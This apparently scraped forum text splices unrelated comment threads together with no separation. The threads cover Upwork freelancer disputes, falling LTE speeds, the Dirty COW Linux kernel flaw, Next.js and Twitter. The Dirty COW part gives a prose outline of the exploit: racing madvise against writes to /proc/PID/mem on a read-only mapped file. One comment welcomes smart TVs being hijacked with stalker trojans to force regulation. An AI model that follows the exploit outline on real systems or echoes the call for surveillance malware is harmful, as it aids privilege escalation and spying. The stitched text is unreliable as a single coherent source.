Shameless plug: I run a new company, CodeGophers, that competes with Upwork. We get a lot of unhappy Upwork customers.

Unlike Upwork our service has a quality guarantee, so clients aren't forced to manage freelancers, and deal with low quality work. It's kind of like a product manager and freelancer combo, and overall it's much easier for the client.

If you're unhappy with Upwork, please give us a shot. You can see our site at https://codegophers.com, or start a task by writing in at:

Never, ever give a price break without a scope change. Apart from the obvious $/hr benefits, it's great way to figure out if the person on the other end of the line is an abusive psychopath. A professional will understand that you're trying to help them achieve a realistic value for their budget. A psychopath will take it as a personal affront and become transparently manipulative and/or abusive. This is a great time to cut off contact before it escalates to the level shown here.

Sorry to hear about this Shadi. Kevin is one hell of a asshole. I try to refrain from using profanity but this man utterly deserved it. Will do my best to let every other freelancer know of this and recommend them to stay away as they can from Upwork.

What I learned from this is not to ignore the warning signs of a psychopath client. Because you can easily get sucked in to a bad situation regardless of your good intentions, and you can't rely on the marketplace to resolve these disputes in your favor. This scenario can also play out on other freelancing sites, and it can also happen if you solicit clients directly and they turn out to be well-connected.

"$100 an hour is more than our CEO makes so I'm not sure we can budget $1500 for this".

Don't bill hourly! I know this sounds like a very silly example (it's not even logically coherent) but reasoning like this gets deployed all the time, even with sophisticated clients. People have anchoring price points for hourly rates that they don't have for other billing structures. Fixing this to make more money is literally as simple as "switch to daily billing".

A freelance marketplace is very much against the idea of freelancing. You are basically working for the marketplace with little freedom to design the actual work processes your way. Everything is geared towards getting positive reviews and thus getting more work through the marketplace. A vicious, underpaid circle.

Sure it works great for building contacts when you are not really visible yet. After you land a few gigs and have work, references and talent to show for, you should really abandon it asap. Better even, not start with it because the gamified nature will lure you in to do more gigs.

Very sorry to hear it. I've employed many on oDesk then Upwork over the years and almost always have great experiences with freelancers. In a rare case when I did have an issue, customer support wasn't very good from the hiring side either, fyi.

Also I think they shot themselves in the foot with the big price hike. Previously freelancers and I would just keep using their platform throughout working relationships. Now we use it like a dating app, meet a freelancer, work a project or two to build trust, and then leave the platform to handle payments on our own.

As another freelancer who has been there, done that (not quite at Upwork, but at three other platforms namely Freelancer.com, PeoplePerHour and Fiverr [yes, Fiverr - and unlikely as it may sound, I found individual clients who placed thousands of dollars worth of work with me there,]) I can only and totally identify + sympathize with the OP here.

Of the three platforms above, I've found PPH to be the best in terms of overall mix/quality of clients as well as the platform's fairness (such as it may be) towards me (the freelancer).

After over two years of doing this almost full time, here is my takeaway:

The platforms have no love lost for the freelancers. Their first and foremost loyalty is (almost exclusively) reserved for the buyers, even to the point of being downright unreasonable in terms of favoring the buyers.

While I've been fortunate enough not to end up with the terminal outcome (yet), I have come close a few times and every time that happens, it is such an emotionally upsetting and disappointing experience that I feel I could write a whole book about it, but then lose the inclination after a while.

Such then, is the state of affairs and I guess there's little anyone (well at least I, at any rate) can do about it.

Just so you know, you inadvertently included Kevin's email address in one of the screenshots. You blurred it out from the "from" section, but it's also showing in a "flagged as spam" yellow box. I'm sure this wasn't your intention.

1. People that try to hire freelancers don't have the decency of considering that freelances have to pay: fees, taxes and other markups (transfer fees for eg).

2. The usual you quote me X but my budget is X/2 tops, and the failure to realize that an Z for hour = x, or i can give you z/2 and double the number of hours and still get X.

When an experienced developer in his field gives you a 15 hour quote, it doesn't mean that it's an easy job that can be done by anybody in that time frame, since if that's the case you would have done it yourself already.

Even before the threats made to Upwork, I feel the 'client' was trying to trick the freelancer.

- Snag a freelancer without providing spec up front.- Once some desperate freelancer signs on, flood the freelancer with tons of work.- If the freelancer tries to back out, threaten that you will file complaint with Upwork. Since freelancer was desperate enough to sign on, the client probably assumes the freelancer will be desperate enough to suck it and finish the work.- Repeat. Hence 40 previous jobs.

> Im not going to talk about the impossibility of competition they offer due to being seriously undercut by those that live in countries with lower costs of living.

As a freelancer/contractor working exclusively for customers that have large budgets and pay a lot I'd advise against ever using such platforms.

You are going to compete with very cheap labour (and often low quality services) and businesses will expect that and pay accordingly.

Even if you have no projects lined up it's better to create your own small service or product which you can use later to advertise effectively what kind of value you could create for prospective customers. (go to local events and get into contact with future customers this way)

It's also interesting to note that Globalisation is so heavily pushed on all levels of our society although we can clearly see that it sucks for the majority living in rich countries.

Most people here probably do recognise (at least subconsciously) that it's impossible for them to compete with persons doing the same job in a third world country, no matter if they do a worse job. They make up for it by offering their services at such a low rate that they offset this easily. (some of them live in countries where you can easily feed, clothe and house a family with $200 a month - it's impossible to compete with that)

You could argue of course that it's great for third world countries (it was) lifting many people out of poverty, but would you want to get poor in the process? (take a look at Detroit, this could be our future)

Google, Apple and other large IT corporations (or really any large corp that needs IT services) of course are interested in lowering the cost of labour for them (which is a legitimate interest for them), so make no mistake, what they try to push politically in this case is certainly not in your interest.

Thank you for sharing your experience, I am closing my account. But do you have any similar (or not) service you recommend me to use ? As a student I work with a company through this platform. Thanks by advance

Does anybody else find it odd that this mans real name is: Shadi Al'lababidi

However, his UpWork profile is: Shadi Paterson

I've seen this done quite a bit when companies (especially the American kind) ship their support overseas, but are either too embarrassed to let their workers use their real names OR justify such actions by saying: "Some Americans will find it difficult to say your name" (or in other implicit scenarios, because your name is Muslim-sounding - or X-sounding - will associate you with terrorism/other-ism).

Imagine the world we live in, where in order to do a job (or get work), you have to literally change your REAL name to appease to the demographic.

Whether Shadi did this of his own accord or was instructed to by UpWork to 'passively appeal' to the hiring-clients, it is quite a shocker to see it YET AGAIN.

I purchase talent from upWork on occasion. But less and less. On the buy-side I think the personal network works better. And, with so many jerks on the buy-side it scares the talent away. Death Spiral.

Is it possible to have a community like this without the BS? How to stop it?

I had a similar experience; used to have 4.8+ rating on Upwork, then accepted a job which went bad largely due to poor and inaccurate spec provided by the client. He actually went to my company website, found out the team members' emails and sent a message to everybody castigating me. I basically begged to him to stop doing any further damage. Upwork always give their clients the benefit of doubt because they know they'll always have a cheap source of freelancers from countries where living cost is low.

Terrible story, all my support to you.It is completely true that the protection we have is very limited and that we must be VERY VERY selective with clients.Also if this means to reject offers.Also if this means to not earn money.I try to give qualified answers and i ask for qualified customers able to communicate and competent to discuss requirements.Otherwise i let them go awayToo busy on other projects thanks is my mantra on UpworkIt needs discipline and will but to be entangled in a poisonous relation with someone who can harm you far worse.Push this story around, it is the best vengeance

It's a real shame. I used Elance for around four years (as a client, not a freelancer). This was before Elance merged with Odesk and became upwork.

I'm sure elance had issues. But I noticed a marked uptick in problems when the upwork migration became. The Elance interface was old school, but very functional.

Upwork was confusing. The migration was a mess and made me a freelancer by default, as I had also had a minor freelance profile on elance that I had never used. Took weeks to resolve.

The desktop app....actually, I don't remember the issue, but it led to me leaving the platform entirely. I think messages took ages to load.

I will eventually look for new freelancers, and I'll need to figure out a replacement when I do. It sounds like Upwork is not a great place to be for a freelancer now and that means the quality ones will be elsewhere.

As a client, I want freelancers to be able to make money, and to denounce bad clients. By catering excessively to clients, Upwork is going to select for toxic clients.

Upwork seems to always take sides with the company/client. It is terrible practice and very scary for freelancers that use upwork as primary income generator.I had few challenges with upwork and it took weeks to resolve. Seems as freelancers have to walk on eggshells around upwork support or clients when issues arise.I guess there is a huge opportunity for the next upwork.

Although sites like Upwork make money from both sides (probably more from freelancers), they are likely to support those offering work.

Perhaps their line of thought goes like: Freelancers would always outnumber those offering work. Even if some walk away or are forced out, it doesn't matter as long as we manage to keep those offering work on board.

The goal here should be to sue, not just making things public. Why don't you get a lawyer the moment your account won't be reopened? Upwork owes you over $1000. A client is seriously trying to harm your public image, which may result in losing customers/business. Both points themselves would be enough to talk to a lawyer. Together they are clear suing material.

If you go public you actually open yourself up to get sued. Also cheaters and bullies will see that you didn't sue and therefore see you as an easy mark. Normal schoolyard logics apply, just that as a grownup you don't hit them in the face but sue.

From the employer side. We're a platinum employer on UpWork with probably close to $100,000 spent on the platform and maybe 70 completed jobs. Tons of reviews calling us one of the best employers on UpWork.

Right after oDesk merged with eLance to form UpWork, the platform rolled out its new "job success" score and sidelined star ratings (which was how it'd previously determined employer and contractor quality).

We typically hire multiple contractors to small test jobs, and let them know these are test jobs. We then keep the best one or two on, and the rest we thank for their work, give them a good review (assuming they at least tried), and end the project.

In this case, right after UpWork rolled out its "job success rate" score, we had a few trial freelancers we brought on who simply did not even start their projects or respond to communications. So we ended those jobs and marked them "unsuccessful."

Within maybe a week, I received a "letter from the principal"-type email from UpWork letting me know that we had too many unsuccessful jobs and UpWork would be monitoring our account to make sure we were following sound hiring principles.

I assumed this was probably a situation where we had 3 job success ratings and 2 of them were unsuccessful, or something like this, since they'd just rolled this out. Whereas we had something like 70 five star ratings (and a couple of four star ratings) built up over the years.

I wrote to UpWork asking what this was about, pointing out that we have tons of five star reviews and this job success thing was brand new, and we just got a form letter back saying, in effect, "just be more careful."

So, now, we make every job "successful" when it ends, regardless how it ended, and are very careful to end jobs in a cheerful way with freelancers and tell them, "Okay! Job 5-starred and marked 'successful'!" in hopes they'll be inclined to do the same. It's not about accurate information. It's about not losing access to the platform.

We do hiring on other platforms as well. Guru, Freelancer, PeoplePerHour. Freelancer and PPH are comparable to UpWork in terms of fees (UpWork's a little bit higher). The PPH interface is pretty good; Freelancer's is not as good, and the quality of contractors on Freelancer leaves something to be desired compared to UpWork (though PPH is pretty good here too). Guru has great contractors and its rates are almost half of UpWork's (12.5% instead of 22.5%), but its interface is something out of 2009 and employers aren't even able to end their contracts with freelancers. It's just a downright byzantine system to use.

So, like it or not, we seem stuck with UpWork for now, and UpWork can run a crummier service than it used to in the oDesk days and charge twice as much for it because, well, they're the only game in town, and that's the market economy. We've moved what work we can off it (e.g., we use 99designs for design stuff now, and have found some terrific contractors we've gone back to repeatedly from them), but UpWork's still the best general place.

Maybe someone else will come along with a better service, cheaper. I kind of hoped PPH would be that, but they charge comparable rates, so maybe that's just what the market rate is for the middle man service between employers and freelancers. Wish they'd plow some of the new capital into better tech though. The new site design is worse than what it was before the upgrade, and often gets stuck loading in the browser. Still better than Guru though.

Back when Elance was a separate site, I created a script to automatically withdraw funds from my Elance account to my bank account. I posted it to their forums and promptly had my account locked "after a routine review". They unlocked it after I jumped through some hoops, but I think the same shoot-first attitude clearly survived the merger with upwork.

What's interesting about the timing of this story is that I have recently been playing around with Upwork for some freelance work and the issue I am having is actually a different one.

I have come to realize that there is a fundamental problem with the marketplace itself. I don't think it matches clients to freelancers properly.

I did two exercises. I posted a few positions as a 'buyer', and I got a lot of spam (i.e. non-personalized, crap postings to my position/gig/job that was obvious they never read it). I got more than I expected, which makes it difficult to weed through and find a freelancer I want to work with. Granted, I didn't want the typical "low-ball" freelancer. I was looking for a freelancer that knew what they were doing. Alas, I was unsatisfied with the results and ended up not finding what I was looking for.

I also responded to gigs as a Ruby developer. What's remarkable is that it is literally very, very difficult to get any work, much less the type of work I would like (high-value work with a handful of clients, potentially doing on-going work).

I first started off with a relatively high-ish hourly rate for UpWork ($80/hr for someone with 8 years of Ruby & Rails experience and 15+ years of web development experience overall). Because I had no 'history' with the platform, that didn't work. I filled out my portfolio, and responded to each job in a very custom way detailing the specifics of how I would tackle each job I was submitting a proposal to. This took much longer than just spamming, and was more mentally taxing, but I figured I could make up for my non-Upwork-track history by putting more into my proposal. No dice.

I then dropped my rates (down to as low as $40/hr) just to test, still no dice. I didn't even get responses.

Then, I assumed that maybe my proposals weren't robust enough or maybe I wasn't communicating my capabilities in my portfolio properly enough, aka I was being hit with a 'portfolio tax'.

So to get over this, I decided to actually bid on fixed budget tasks that were very specific in what they want and overlapped with specific stuff I have done in the past -- specifically "B2B Lead Discovery" or "Website Scraping" for something.

I recently have been playing around with scraping websites for different types of leads, particularly B2B, and so this suited me perfectly.

I then started applying to some of these with not just the specifics of what I have done, how I would tackle their specific task, but I would even send them sample results for similar leads to what they were asking for. So say someone was looking for wedding planners from each state (an actual job posting) where they would need the $CompanyName, $Website, $Email, $PhoneNumber, $Address. I replied telling them I have experience doing exactly this....in fact, I recently did this exact thing for accountants, so I replied explaining what I have done and how I can help them and I sent them a CSV file with a list of sample accountants, along with a picture of my script producing those results.

In one case, I crawled the specific website they wanted crawled and showed them pictures of the script doing that and then I gave them a suggestion based on what they were looking for and what I found. There was a disconnect between what they wanted, and what could be technically scraped from the website (they wanted email addresses for all users on MySpace to be exact). So I informed them that unless MySpace has an API that gives out this information, and unless you are looking for email addresses that people post within comments on the music throughout the site, this is a waste of time and I provided proof from my script.

Suffice-it-to-say, I did a lot of work on each proposal. I did about 7 - 10 of these specific proposals for scrapers, and about 15 - 20 other specific but not as specific proposals. I also didn't change the price they asked. So if they said their budget was $10, I replied with all of the above with a $10 budget. This is crazy, I know...but I did it just to experiment.

The results? Not even 1 reply. Not even 1. You can see screenshots here [1].

Yes, my portfolio on Upwork could be weak (although I doubt it because I think it looks pretty robust), and my profile could be a deterrent (because the language I use is a mismatch to what these clients are looking for) and my rates could be high relative to the rest of the marketplace, but the real issue is just an overall non-response from ANY of the 20+ proposals I submitted over the period of a week.

Something feels fundamentally broken with that, especially when considering my experience with the other-side of this experience.

I believe that there is some middle ground between the "elitist" Toptal and "broken" UpWork. So, I would like to try an experiment.

Do you have any high value ($30K+ -- note this is a floor, just to weed out inappropriate clients) development projects that you would like done? Either generic projects where no tech stack is specified or Ruby and Rails jobs for starters. I won't specify the types of projects, but something where you would prefer a "high-quality" developer help you see it to fruition rather than the cheapest developer you can find. Perhaps you have tried other developer services/gig boards and are unhappy with the process.

Do you want a product manager to help drive the entire process for you, from beginning to end?

If this sounds interesting to you, please send me an email to: marc+hnexperiment@mymvpblueprint.com.

If I can find a pattern for how to find these types of projects consistently, I would love to work with other developers to fill these needs. Until then though, let the experimentation begin!

Ugh, what a terrible, terrible client. But I think the title draws the wrong conclusion. I've personally been a client on Upwork over the last year, paying several developers to work on open source software, and all parties have been very happy with the experience. I think one should think about this incident in the broader context:

* It's clear Upwork support screwed this case up. But one should keep in mind that resolving disputes between two people who both complain the other is a criminal (as in this case) is a really hard problem. The US justice system often gets it wrong (something egregiously). While it sucks when it happens, I think one should expect platforms like Upwork to screw up sometimes too.

* Dealing with people trying to cheat is a fact of life in any business. I've heard horror stories in the freelancing world of clients deciding not to pay a freelancer for months or work, freelancers pretending to do work, etc. Often, the wronged party is unable to get the dispute resolved satisfactorily, especially if the two parties are in different countries. Any marketplace the size of Upwork (https://www.upwork.com/about/ says $1B in jobs annually) will have a large absolute number of both bad clients and bad freelancers (there are certainly tons of bad bosses and bad employees in America, lots of bad taxi drivers, etc.). At least with a platform like Upwork or Uber, there's a reputation system where bad actors get bad reviews and eventually stop getting matched with other people. I'm willing to bet that this employer is a jerk to the people he hires not on Upwork, too.

* This particular client's behavior is extremely bad in several ways. But at least the client had bad reviews on the platform. Do business with bad people at your peril! They will figure out how to screw you.

* I had thought the "screenshots every 10 minutes" feature of Upwork was just an annoying invasion of privacy, until I had a freelancer report 50 hours of work fraudulently (i.e. he didn't post any work starting ~50 hours before I stopped paying him), make a bunch of increasingly unrealistic excuses that he would post his work soon once he got back from a vacation or whatever, and eventually disappear. After investigating, Upwork banned the freelancer, but their terms of service don't allow them to recover money already paid since we weren't using the screenshots feature. While I was upset and frustrated by it, I've also seen employees in the US stop working and hope to get a month or two of free pay before they get fired, and it's basically the exact same thing. Given the larger picture of Upwork having 3M jobs/year, mostly for relatively small amounts of money, there are probably a lot of disputes, and I think you should expect to have a significant fraction of disputes decided in a way where at least one of the parties leaves the dispute upset because the decision was wrong (the US civil justice system certainly has that property!). And keep in mind: a 5-20% fee on projects with a <$1000 average size doesn't pay for a lot of manual dispute resolution. Things like screenshots of emails can be forged; who knows what other fabricated evidence the client gave to Upwork support to help their side of the case. The screenshot mechanism is Upwork's current best solution for making dispute resolution efficient, and I think it does help: I haven't had fraud issues with those freelancers who are using it (and Upwork's ToS do allow recovering money from people whose screenshots show they weren't working). They address the privacy issues somewhat in that the freelancer can delete any screenshots they like before sharing with the client. They just don't get paid for those 10 minute windows.

OK, that's my little essay on the Upwork experience. Upwork isn't perfect, but no large marketplace is. Keeping bad actors out of a marketplace is a really really hard problem, and I don't think it's possible for them to eliminate bad behavior. Still, I hope they kick that client off the platform and take this incident as a wake up call to invest more in improving their dispute resolution processes.

A quick reminder that 4G != LTE. The 4G specification requires a minimum speed [1] so LTE was launched to avoid exactly this minimum. It seems that the companies did it right by launching LTE instead of 4G as they could have lost their 4G status, while now they could drop as low as 3G speeds and still be called LTE (which is ironic on itself).

This wasn't commented at all in the article, using 4G and LTE interchangeably which I find troubling.

Traditionally the way that carriers deal with bandwidth congestion is to wait until people start screaming (and networks start breaking) before they invest in innovation. There are a bunch of technologies that could ease congestion and deliver significantly better wireless performance but they would require an investment that doesn't make sense for carriers (it's not like carriers can extract more money from you if the network is better...).

That is to say, subscriber ARPU does not increase with network investment, so why invest in the network until it becomes a drag on subscriber growth?

Source: I was a manager at ATT when the network in San Francisco basically died with the introduction of the iPhone 3G. It stayed that way until ATT added new towers and upgraded the software on the towers for better spectrum utilization.

Living in SF, I haven't really noticed this, which the article bears out. I was actually just commenting in one of our Slack channels at $work that it's still kinda weird to me that the internets are, on average, at least 4x faster (throughput, not latency) on my phone vs my home internet service (bonded DSL).

EDIT: Out of curiosity, I just checked again, first on LTE and then on WiFi:

Mobile networks in a way are seemingly destined to be victims of their own success. I find that no matter what mobile bandwidth I'm getting, I can always use more. For example, considering adding a dedicated hotspot to my existing plan, just for my car. The better it works, the more I want to use it. And by "it", we are talking about a fixed physical infrastructure, otherwise known as a capital investment.

"There is no doubt that the US will need to set up the infrastructure to keep pace with the rapid changes in usage and content expected in the future. Like any instance of supply and demand, we will continue to see a give and take in this market. As operators catch up to the current demand and LTE becomes faster, users will opt to use it over others thus creating greater demand, supply scarcity, and decreased performance. At which point the cycle will begin again."

TL;DR Expect more network management in the future due to heavy demand of a constrained resource.

I think that control of content is one of the major reasons for this. If users were more able to readily (and for zero cost to them) cache content when connected to local networks then we would see less content transferred over 'higher cost' networks.

Of course streaming services (I'm thinking more of Twitch than Netflix) for live content production are 'rather difficult to cache' in their prime viewing time.

I've noticed it big time in the northeast. I live on the road and work via a Verizon connection. Over the last 6 months over 7 or 8 locations I get a full Verizon signal (with a booster) and very low speeds compared to a year ago. And speeds increasing at off peak times (it's fast in the middle of the night) point to overloaded towers.

I know people love to hate on cell companies but it must be hell to try and keep up with demand that changes so rapidly.

Hey look, another example of why trying to sell the rights to light sucks.

We are going to see AT&T / Verizon / etc go the way of Comcast soon. The cost to improve service will be high enough and the overhead of trying to get more spectrum when they hit physical limits annoying enough and their revenues large enough and the demand insane enough they are going to constantly try to buy each other out than actually invest anything until we have one big corrupt mess like Comcast is for physical wire service.

It seems like the inevitable outcome of having infrastructure services that should be public utilities instead be provided by private companies competing over who can exploit the state to get more unfair advantage, be it land access rights for wire carriers or FCC bribing for spectrum.

What I don't get is: why can't I as an app developer specify what kind of data transfer rate I need and have the phone choose which connection type it needs depending on the currently running software?

Like, if I'm doing push notifications or IRC, I'd tell the phone that I only need 2G speeds, and the phone only connects to something faster than 2G if I open the web browser.

Right now, my phone books into LTE as soon as it's in coverage mode - and it stays there, eating power like nothing else, instead of dropping into the relatively quiet and strong-signal 2G/3G/HSxPA cells and saving power.

I remember getting on VZW LTE reasonably early, with the HTC Thunderbolt (don't even get me started; that device was trash) and I consistently got 60-80Mb down. Now I'm the same location, same carrier, infinitely faster LTE modem, I get maybe 5-10Mb if I'm lucky. Such a shame, could've been transformative.

I went to a wedding in upstate New York last weekend, and I on the drive up, there were some areas where I had no 4G (or LTE, or whatever my phone gets), but anywhere that it was available, it was substantially faster than what I'm used to from the densely-populated areas where I spend most of my time. I assume this was because there were simply fewer people sharing approximately the same bandwidth.

This is an interesting read, but the comparisons to other countries/regions omits any mention of population density. It's much easier to roll out public utilities in dense areas than sparsely populated ones, and western Europe and Korea are more densely populated than the US.

Not that this excuses the big drop in speeds, but it makes the comparative piece a bit less relevant/accurate.

Des the actual report cover whether there are any differences across carriers? I know in the 3G era there used to be fairly significant variations for the companies which installed newer base stations without upgrading their back-haul capacity to match.

Yes the more people that use it slower it goes since people have to share the same bandwidth. However given all the datacaps the faster the speed the faster you hit the datacap so I guess you can look at the positive side.

mm: remove gup_flags FOLL_WRITE games from __get_user_pages() commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 upstream. This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a ("Fix get_user_pages() race for write access") but that was then undone due to problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug"). In the meantime, the s390 situation has long been fixed, and we can now fix it by checking the pte_dirty() bit properly (and do it better). The s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement software dirty bits") which made it into v3.9. Earlier kernels will have to look at the page state itself. Also, the VM has become more scalable, and what used a purely theoretical race back then has become easier to trigger. To fix it, we introduce a new internal FOLL_COW flag to mark the "yes, we already did a COW" rather than play racy games with FOLL_WRITE that is very fundamental, and then use the pte dirty flag to validate that the FOLL_COW flag is still valid.

At Appcanary, we're thinking about opening up our vulnerability database to be browsable and searchable by the public. If you're not sure which version has the patch for this vulnerability in your distro, here's what we know:

Look, the Azimuth people have forgotten more about reliable exploit development than I have ever known, but, no, as stated, this is clearly not true. Not long ago, pretty much all local privesc bugs were practically 100% reliable.

What I think they mean to say is that this is unusually reliable for a kernel race.

I still think, though, that the right mental model to have regarding Linux privesc bugs is:

1. If there's a local privesc bug with a published exploit, assume it's 100% reliable.

2. In almost all cases, whether or not there's a known local privesc bug, assume that code execution on your Linux systems equates to privesc; this is doubly true of machines in your prod deployment environment.

CVE-2016-5195 This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set. This is achieved by racing the madvise(MADV_DONTNEED) system call while having the page of the executable mmapped in memory.

Excellent example why mounting partition with system binaries (such as /usr) read-only is a good idea. CoreOS does this.

Okay, I have no idea what to do. Not a security engineer, can't follow what this thing does but I do have a couple of VPS's running my blog and a few other things. Now maybe there's an argument that I shouldn't be doing this if I don't completely understand all the ins and outs, but what the hell, I like learning about Linux.

So my question is: is simply updating and upgrading enough to protect me from this MOST DANGEROUS BUG EVER IN THE WORLD OH MY GOD YOU'RE GOING TO END UP PART OF A BOTNET AND HURT LITTLE CHILDREN!!1!!1! Which is how this reads to even a semi-technical reader, I mean I know my way around the command line but I'm at a loss as to what to do here.

Since for any serious bug that's published, there's very likely a dozen private or not-yet-found, and also considering on how many networked devices the linux kernel is used, I would really like to see a better upgrade story for Android devices and any other linux-inside gear which doesn't have a distro package manager to apply the fix. As little as I like obstructing tech companies with more laws, especially since most laws don't understand the tech, I feel like laws are the only pressure we can hope for. This is why the abuse of IoT devices is a good thing. It will highlight how dangerous it is to slap a random linux version in some device and never bother with updates. A fleet of smart tvs needs to be hijacked with a stalker trojan that is then used by people to record and later post online private moments of unsuspecting owners of always standby smart tv, amazon echo networked microphones, etc. It's just how the world works before it realize the risks and does something about it.

As an engineer you can argue and plead with management to not release something that you don't intend to provide timely updates with a well-communicated support time. Like a 2 year warranty that's prominently communicated, this would highlight to consumers that it's unsafe to use the device unless disconnected from the network. Just like a car that doesn't pass your local safety regulations is not allowed into public traffic.

Actually, I'm surprised modern cars do not require periodic zero-expenses-for-the-owner software updates at licensed dealerships. You can explain to a driver that tires go bad because they drove X miles and have to be paid for, but you cannot argue that software updates need to be paid for because from the time they bought it Y days have passed. Take the Samsung battery optimization that went wrong, where the separation layer was a tiny bit too shallow. It's fair to assume some regulation will follow for safety purposes. Similarly, networked devices, which are not (and cannot be?) microcontrollers with mere 500 lines of code, have to be regulated in terms of software updates.

Now you may say the industry will go broke if they're required to provide upgrades, or less devices will be made, but I think this will lead to consolidation of the software stack, which is mostly a good thing, as those who want to produce dozens of cheap IoT devices can do so without hiring kernel developers. It's like other industries where cheap toy makers source materials like plastic from vendors, knowing it's safe, or create the materials following a detailed recipe which is certified.

Can someone help me better understand how this works, or perhaps point me to a decent article explaining more of the details? Most of the articles I can find just briefly explain the exploit, but not really how it works (in detail).

From looking at the example code, it seems like the general process is:

- Open some (normally un-writable) file as read-only and mmap it in to your process.

- Kick off two threads. One thread to repeatedly write to the same mmap-ed address via /proc/PID/mem and another thread to keep issuing the madvise call.

- Wait for some race condition to be (un)satisfied such that you're able to write to a cached copy of the file.

What I dont fully understand is how the /proc/PID/mem thing works.

Heres what Im curious about:

1. What would happen if you tried to write to the mmap-ed region directly? Since its been mapped in with PROT_READ, does this mean that youll get a segmentation fault or something? From the manpage, it seems like MAP_PRIVATE allows it to be a COW mapping, but I dont see how the combination of PROT_READ and MAP_PRIVATE is even valid. Unless this means that any writes to data copied from the mmap-ed region into other buffers will be COW-ed and that you cant actually write to the mmap-ed region itself? That would make sense to me.

2.How is writing to /proc/PID/mem any different than writing through the mmap-ed region directly? Assume that you werent running the madvice thread. What would happen then if you tried to write to the /proc/PID/mem file? Presumably the same thing that happens if you just tried to write to the file directly

3. Finally, how does the madvice call cause a race condition? I realize this might be a little too much to cover in a comment, but this seems like the meat of it.

Doesn't seem like it works on a $10 DigitalOcean droplet (1 vCPU) with grsec-patched 4.4.8. After running for quite some time (which I suspect a system administrator would notice) "cat foo" still outputs the same contents.

The github page [0] states that "The In The Wild exploit relied on using ptrace."Now, I'm wondering what purpose ptrace serves, aside from debuggers? Why don't we just disable this by default on production systems (where you shouldn't be debugging anyhow)?

Interesting! I really like the architecture here. I think the next major opportunity for abstraction is all the server/client detection you still have to do. Do I want `request.headers['Cookie']` (server), or `document.cookie` (client)? Do I want to create a fresh Redux store (server), or hook into a global one (client)?

It's definitely not hard for community members to build these abstractions themselves (`cookies = (req) => req ? req.headers['Cookie'] : document.cookie`), but some of these are going to play into major use cases like authentication, so, as Next matures, it'll start to make sense to provide these especially common abstractions out of the box.

That said, these are next steps; the first release is all about showcasing the fundamental architecture, and it's looking gooood :D

I'm a little confused about the benefits of server side rendering. I thought the point of these js UI frameworks was to make the client do a bunch of the work? Can anyone give me some of the upsides? Thanks!

Very cool. I can't wait to try it after five years in Node land. The people behind zeit.co are great minds in the community.

It is funny how concepts come and go in circles. ASP.NET offered unified client and server development, though mostly in C#. It had the nuget package manager and VS store or something, but it was never amazing and packed like npm. Partial page postbacks and page state in encrypted strings..yikes. Now we have that in redux I suppose. It is all so familiar, yet so much better now.

Surprised to see after 10 hours no one has mentioned intercooler.js which is a stepping-stone in the direction developers focused on the "server" part of "server-rendered" might head without going as far as Next.js.

Awesome, took me like less than 10 minutes to create a basic server side newsreader app with React. Simplicity of PHP and power of React combined and brought to Node. I also like how the consolelog statements are shown in dev console

Meatier also uses Babel, React and Node.js except that it has been around for almost a year and is already stable.They've already solved all the difficult issues like realtime pagination, authentication, GraphQL, etc...

This sounds great for static websites but I'm not sure if it's a good idea for a dynamic web app where data needs to update on the screen in realtime. Some questions which come to mind:

What if you had a 'chatbox' component which updated every time a user wrote a message; would Next.js have to resend the entire HTML for the 'chatbox' component (containing the full message log) every time a message is added to that chatbox? Am I right to assume that only the affected component will be rerendered? Or the entire page has to be re-rendered (and the entire HTML of the page resent over the wire) for every change in data?

It sounds like a nightmare for caching: If data is updated dynamically and you constantly have to rerender components in realtime on the serverside; you can't really cache every permutation of every component's HTML for every data change and for every user... That's insane.

Regarding CPU, it sounds like it's going to eat up server-side performance and increase hosting costs massively! What, like 10 times 100 times? Are there any benchmarks done on performance for a typical single page app built with Next.js?

Then there is the latency issue...

Finally; if we move back to full server rendering and get rid of the need for client-side code; why would we want to stick to JavaScript?

I haven't used it yet so please correct me if I'm misunderstanding something.

I love the addition of async `getInitialProps` (more for being async than getting props, would be as fine for me as getInitialState).

The logic for rendering loading screen in a component can quickly get tedious and annoying, such a pattern helps having a global loading screen and still allow the component to be responsible of how to fetch its data.

I don't understand why you need any client side framework. Couldn't this all be accomplish server side with the HTML pre-fetched on the client if needed for performance? There isn't anything dynamic about the website so it could run with zero javascript and then things like the back button after scrolling through the blog would work.

So if I understand correctly, this would 'transform' Node into a web framework la Django? Please correct me if I misunderstood. If that's the case, how Node-Server-Render will compare to Django,Flask and other Python web frameworks?

Performance better on Node? Feedback from the trenches would be appreciated.

Having to put your program in a string makes it hard to edit.Syntax highlighting, static analysis and tooling in general that helps you filter problems might not work there.

To me, tooling is very important since software is more consistent/reliable/productive at simple repetitive tasks like matching parenthesis, braces, quotes... and in my case I take it further like documenting types via documentation tags and verifying that function signatures and return types match. That alone helps me save a lot of time once the code has grown over 1 kSLOC.

Off-topic, but what process are people using to make these animated demos? The command-line and browser demo on this page is so clean and crisp. Is it just a screen cap with a ton of post-processing, or is there more to it?

Javascript development on the web has become such a mess... Web apps are totally bloated, tons of javascript loaded, server side rendering for search engines. Mixing css HTML and javascript together to have a component framework that actually is run within javascript... Not within the browser engine... Its library on top of library on top of library.... Really..? W3C should come up with alternatives, that also work as mobile apps... The web has become an overengineered mess.

I've always sort of had this question that continues to feel naive - but I'm not sure I know the answer: why do so many companies feel like they have to grow perpetually? Why can't Twitter just be happy being Twitter, knowing its limits and making a stable profit? Instead it's more users, more VC money, more staff... constantly burning as quickly as possible. There's a ceiling on every business; it's all bound to come crashing down eventually if you don't stop somewhere. Either you do it gracefully or hundreds of folks have to eventually lose their job unexpectedly (very sad).

Is the answer simply that earlier VCs put pressure on the executives to keep growing so they can multiply their investment?

Personally I dream of making a living establishing a patio11-type software business. Something where I can do a high quality job and own all of the decision-making. The ceiling doesn't have to be very high for one guy to sustain himself, and software is appealing because you can automate away nearly all of the "work".

I still maintain that screwing over client developers had something to do with it. At the very least it didn't help them "control the twitter experience". Every time I see one of their new ads about how much Twitter loves developers I laugh out loud. There is zero chance I'll ever integrate Twitter into anything I do, period. I'll fight against it anywhere I work and encourage all my peers to do the same.

Did everyone forget they didn't even invent the word "Tweet"? Nor did they write their mobile clients. They had no idea what they were doing and stumbled into success. Then the MBAs turned around and stabbed us in the back.

